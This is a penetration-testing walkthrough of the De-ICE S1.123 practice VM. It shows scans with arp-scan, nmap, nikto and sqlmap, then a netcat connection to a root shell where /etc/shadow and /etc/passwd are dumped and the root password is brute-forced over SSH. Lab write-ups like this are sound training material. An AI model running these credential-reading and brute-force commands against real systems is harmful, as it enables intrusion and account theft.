I did not find this one from an old hard drive, the only thing I had was the link to the ISO and two empty text files. So this is basically a clean up to date walkthrough using Kali. This one was short and sweet, not to many flags to deal with. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.
Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso
Default IP: Hey, Look at flag one slacker
1. Find default IP for system
2. Enumerate ports and services
3. Identify web and network vulnerabilities for system
4. Gain root access to system
Spoilers and Walkthrough
We have used a few different tools to find hosts on a subnet and we will add another one for this test. ARP (address resolution protocol) maps physical MAC addresses to the corresponding IP address for a network, because it isn’t routed it is useful for finding systems . There are multiple tools that use ARP for this discovery but I have chosen arp-scan because it is already installed in Kali and I knew the switch to use.
root@kali:~# arp-scan --localnet Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 192.168.1.1 00:50:56:c0:00:08 VMware, Inc. 192.168.1.2 00:50:56:e7:84:3f VMware, Inc. 192.168.1.123 00:0c:29:1f:c6:f0 VMware, Inc. 192.168.1.254 00:50:56:e7:f4:91 VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.420 seconds (105.79 hosts/sec). 4 responded
Now that we know it is the .123 address lets port scan the image to get started. Once again, we will use the metasploit console to keep all of our into in one place.
msfconsole workspace -a de-ice123 workspace de-ice123 db_nmap -T5 -A -p 0-65535 192.168.1.123
That is a lot to work with so lets narrow it down a bit and get started with some information gathering. Finger will expose user names and there is a simple scanner for it already built into metasploit.
use auxiliary/scanner/finger/finger_users [*] 192.168.1.123:79 - 192.168.1.123:79 No users found.
That didn’t go as well as I had hoped. Lets look at a list of other open ports.
services 192.168.1.123 901 tcp http open Samba SWAT administration server
Unfortunately, that is behind HTTP basic authentication and we don’t have any credentials to test yet. A little research shows that the by default it uses the root account and password for credentials. We can put that in the pile for a brute force attack later. Why am I showing you all of this stuff that doesn’t work? Because welcome to penetration testing. 99% of the things that you find, research, or try will be dead ends. That super sweet exploit the scanner found will either be a false positive or the local AV will eat the exploit and no amount of encryption and obfuscation will work. But, the research you do today about the finger service will pay off in three months when you run into it on another system.
Lets look at the Dokuwiki listening on port 80 and see if we can web app pen test this thing. I don’t want to copy all of the results here but I will paste the command and a few things that peaked my interest.
nikto -h 192.168.1.123 + OSVDB-3268: /data/: Directory indexing found. + OSVDB-3092: /data/: This might be interesting... + OSVDB-3268: /lib/: Directory indexing found. + OSVDB-3092: /lib/: This might be interesting... + OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
I couldn’t validate the /bin system shell but one of you smart web app people will probably get that. Manually looking through those pages with a browser might give you an idea of a few things that we will do later on. Since we have already used Nmap we can check that one off the list. I will use the sqlmap next since we might be able to inject the ?id= parameter. Using the wizard isn’t 1337 H4x0r but it is an easy test so there is not a reason to use Burp to capture a request.
root@kali:~# sqlmap --wizard [22:43:57] [INFO] starting wizard interface Please enter full target URL (-u): http://192.168.1.123/doku.php?id=netcat POST data (--data) [Enter for None]: Injection difficulty (--level/--risk). Please choose:  Normal (default)  Medium  Hard > 3 Enumeration (--banner/--current-user/etc). Please choose:  Basic (default)  Intermediate  All > 3
No luck so if there is a SQL injection it is more obscure or needs some additional testing. Since the wiki talks about netcat lets see if that is a hint. There are two interesting ports based off numbering to look at 1337 and 31337. As a penetration tester DON’T DO THIS. Don’t try to be clever and show you are an elite hacker, also change the default port on your meterpreter shells. Be professional, 4444 and 1337 raise a lot of red flags on an IDS that 8080 and 8443 won’t. For readability I’ve bolded my command inputs.
root@kali:~# nc -vv 192.168.1.123 1337 192.168.1.123: inverse host lookup failed: Unknown host (UNKNOWN) [192.168.1.123] 1337 (?) open id uid=0(root) gid=0(root) cd .. ls bin dev etc home lib mnt opt proc root sbin sys tmp usr var cd ..pwd / cd etccat shadow root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:13553:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: cat passwd root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/:
Lets validate that we have SSH access after reversing that hash. You already reversed that hash with John right?
msf auxiliary(ssh_login) > run [*] SSH - Starting bruteforce [+] SSH - Success: 'root:toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux ' [*] Command shell session 1 opened (192.168.1.128:36105 -> 192.168.1.123:22) at 2017-04-13 23:34:37 -0400 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(ssh_login) > sessions -i 1 [*] Starting interaction with 1...
We are root on the system through a netcat shell. On a real penetration test this would be a bad finding, this is where you actually stop testing and call your contact to tell they someone else has compromised their systems. Could it be a really bad system administrator who decided that adding a wildly unsecured access method was a good idea? Yes. Could it be a malicious attack? Yes. In this case you would grab a screenshot for your report and send up a flare to your client. Who knows, maybe you will get extra billable hours to clean it off.
I dug around on the rest of the system looking for other flags but didn’t find any data to manipulate. Based on the age of the PHP and Apache install there are probably lots of vulnerabilities that can be exploited on this system.